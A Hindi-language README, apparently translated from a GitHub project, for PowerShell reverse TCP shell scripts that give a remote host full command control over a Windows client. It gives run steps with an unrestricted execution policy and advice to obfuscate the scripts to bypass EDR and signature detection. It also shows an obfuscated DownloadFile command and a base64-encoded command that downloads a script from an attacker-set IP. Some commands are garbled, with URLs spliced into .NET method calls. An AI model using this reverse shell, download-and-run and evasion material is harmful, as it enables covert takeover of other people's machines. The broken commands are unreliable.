
रिमोट होस्ट के साथ संवाद करने के लिए PowerShell स्क्रिप्ट्स।
दूरस्थ होस्ट के साथ संचार के लिए पावरशेल स्क्रिप्ट्स।
दूरस्थ होस्ट का क्लाइंट और सभी अंतर्निहित सिस्टम कमांड पर पूर्ण नियंत्रण होगा।
इन पर आधारित शेल देखें:
विंडोज 10 एंटरप्राइज OS (64-बिट) पर पावरशेल v5.1.19041.2673 के साथ परीक्षण किया गया।
शैक्षिक उद्देश्यों के लिए बनाया गया। मुझे उम्मीद है कि यह मदद करेगा!
इस रिपॉजिटरी में ज्ञात हस्ताक्षर होने लगे हैं और मेरे पास हर बार नई स्क्रिप्ट अपलोड करने का समय नहीं है, इसलिए आपको इन स्क्रिप्ट्स को स्वयं अस्पष्ट करना चाहिए।
भविष्य की योजनाएँ:
स्क्रिप्ट्स में आवश्यकतानुसार IP पता और पोर्ट नंबर बदलें।
पावरशेल को \src\invoke_expression\original\ या \src\process_pipes\original\ से खोलें और नीचे दिखाए गए कमांड चलाएँ।
निष्पादन नीति सेट करें:```pwsh Set-ExecutionPolicy Unrestricted
स्क्रिप्ट चलाएँ:```pwsh
.\powershell_reverse_tcp.ps1
या, निम्नलिखित कमांड को PowerShell या Command Prompt से चलाएँ:```pwsh PowerShell -ExecutionPolicy Unrestricted -File .\powershell_reverse_tcp.ps1
## PowerShell स्क्रिप्ट को अस्पष्ट करें
EDR और अन्य सुरक्षा तंत्रों को बायपास करने का प्रयास करें, अपनी स्क्रिप्ट को अस्पष्ट करके। आप नीचे दिए गए उदाहरणों में ऐसे अस्पष्टीकरण देख सकते हैं।
मूल PowerShell कमांड:```pwsh
(New-Object Net.WebClient).DownloadFile($url, $out)
अस्पष्ट PowerShell कमांड:```pwsh
& (GCM *ke-E*) '(& (GCM ew-O) NET.WEBCLIENT)."DOWNLOADFIL`E"($url, $out)'
**मूल PowerShell स्क्रिप्ट [यहाँ](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/original/powershell_reverse_tcp.ps1) और पूरी तरह से अस्पष्टीकृत स्क्रिप्ट [यहाँ](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/obfuscated/invoke_obfuscation/powershell_reverse_tcp_obfuscated.ps1) देखें।**
[मैन्युअल अस्पष्टीकरण](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/obfuscated/powershell_reverse_tcp_manual.ps1) के बाद, मूल PowerShell स्क्रिप्ट को [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation) के साथ अस्पष्टीकृत किया गया था। लेखक को श्रेय!
अतिरिक्त अस्पष्टीकरण तकनीकों और विधियों के लिए इंटरनेट पर खोजें।
P.S. चूंकि PowerShell लगातार अपडेट हो रहा है, कुछ रेगुलर एक्सप्रेशन (जैसे `*ke-E*`) एक ही एक्सप्रेशन से मेल खाने वाली कई विधियों के कारण अपवाद फेंकना शुरू कर सकते हैं, इसलिए एक्सप्रेशन को थोड़ा बेहतर निर्दिष्ट करने की आवश्यकता होगी।
### PowerShell एन्कोडेड कमांड
एक PowerShell स्क्रिप्ट से PowerShell एन्कोडेड कमांड उत्पन्न करने के लिए, निम्नलिखित PowerShell कमांड चलाएँ:
$text = "(New-Object System.Net.WebClient).DownloadString('http://192.168.8.119/powershell_reverse_tcp.txt')" $bytes = [System.Text.Encoding]::Unicode.GetBytes($text) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand
[Convert]:https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/:ToBase64String(%5BText.Encoding%5D::Unicode.GetBytes(%5BIO.File%5D::ReadAllText($script)))
```
PowerShell एन्कोडेड कमांड को डीकोड करने के लिए, निम्नलिखित PowerShell कमांड चलाएँ:```pwsh
[Text.Encoding]:https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/:Unicode.GetString(%5BConvert%5D::FromBase64String($command))
```
यदि आप कोई कलाकृतियाँ पीछे नहीं छोड़ना चाहते हैं तो नीचे दिए गए एक-लाइनर्स का उपयोग करें।
---
```